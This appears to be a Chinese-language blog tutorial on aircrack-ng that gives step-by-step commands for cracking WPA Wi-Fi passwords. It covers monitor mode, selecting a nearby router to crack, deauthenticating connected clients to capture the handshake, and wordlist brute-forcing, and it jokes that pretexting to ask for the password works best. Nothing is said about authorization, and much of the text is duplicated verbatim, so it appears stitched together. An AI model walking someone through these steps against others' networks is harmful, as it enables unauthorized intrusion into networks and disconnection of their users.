無線安全審計工具aircrack-ng詳解
阿新 • • 發佈:2018-11-26
無線滲透試的工具有很多,在windows下和Linux下的工具各有千秋,因在windows下的工具基本都是圖形介面,操作起來比較直觀易懂,在此就不再做過多介紹,本方重點介紹在linux下的一種通用的方法。
首先講一下現行無線滲透試的一般方法和原理。
目前無線滲透試的兩種方法:1、抓握手包,跑包。2、通過WPS進行跑pin碼
當然第2種方法是要求路由器開啟了wps功能。並且要求路由器沒有設定pin防護,其它的方法如路由器漏洞等不在此討論範圍內。
WEP方式認證的路由器已經很少了,而且這種認證方式不但非常不安全且絕對可破,不再講解,本文只講WPA認證方式的滲透方法。
其實最有效的取得密碼的方法是直接編個理由過去問!(社工)
原理:抓到的包中有密碼的密文,做暴力跑包即可。
工具:aircrack-ng工具包(kali內建),一個支援監聽模式的無線網絡卡。 第一步:開啟無線網絡卡的監聽模式。 這一步首先你的系統要識別你的無線網絡卡。 使用 ifconfig -a 命令檢視你的網絡卡叫什麼名字。比如叫wlan0 使用 ifconfig wlan0 up 啟用你的無線網絡卡。
使用
airmon-ng check kill
結束系統中可能的干擾程序。
使用
airmon-ng start wlan0
開啟你網絡卡的監聽模式。並記住監聽模式的名字。
第二步:監聽周圍wifi狀態,選擇要破解的無線路由器
使用 airodump-ng wlan0mon 開始監聽
第三步:針對要要破解的wifi重新開啟一個監聽記錄,傳送斷開命令,等待客戶端重新連線時監聽密碼包。 airodump-ng -w 檔名(自己起一個名,用來儲存監聽到的資料) -c 監聽頻道 wlan0mon
開啟另一個shell使用 aireplay-ng -0 1 -a 路由器的MAC地址 -c 客戶端的MAC地址 wlan0mon 強制斷開連 接到路由器的裝置,以便在它再次連線時捕獲它的認證包。 看看原來的airodump-ng的視窗是否在右上解提示有WPA handshake監聽到
第四步:跑包測試加密的無線密碼 aircrack-ng -w 準備好的密碼字典 捕獲到的資料包
工具:aircrack-ng工具包(kali內建),一個支援監聽模式的無線網絡卡。 第一步:開啟無線網絡卡的監聽模式。 這一步首先你的系統要識別你的無線網絡卡。 使用 ifconfig -a 命令檢視你的網絡卡叫什麼名字。比如叫wlan0 使用 ifconfig wlan0 up 啟用你的無線網絡卡。
使用
第二步:監聽周圍wifi狀態,選擇要破解的無線路由器
使用 airodump-ng wlan0mon 開始監聽
第三步:針對要要破解的wifi重新開啟一個監聽記錄,傳送斷開命令,等待客戶端重新連線時監聽密碼包。 airodump-ng -w 檔名(自己起一個名,用來儲存監聽到的資料) -c 監聽頻道 wlan0mon
開啟另一個shell使用 aireplay-ng -0 1 -a 路由器的MAC地址 -c 客戶端的MAC地址 wlan0mon 強制斷開連 接到路由器的裝置,以便在它再次連線時捕獲它的認證包。 看看原來的airodump-ng的視窗是否在右上解提示有WPA handshake監聽到
第四步:跑包測試加密的無線密碼 aircrack-ng -w 準備好的密碼字典 捕獲到的資料包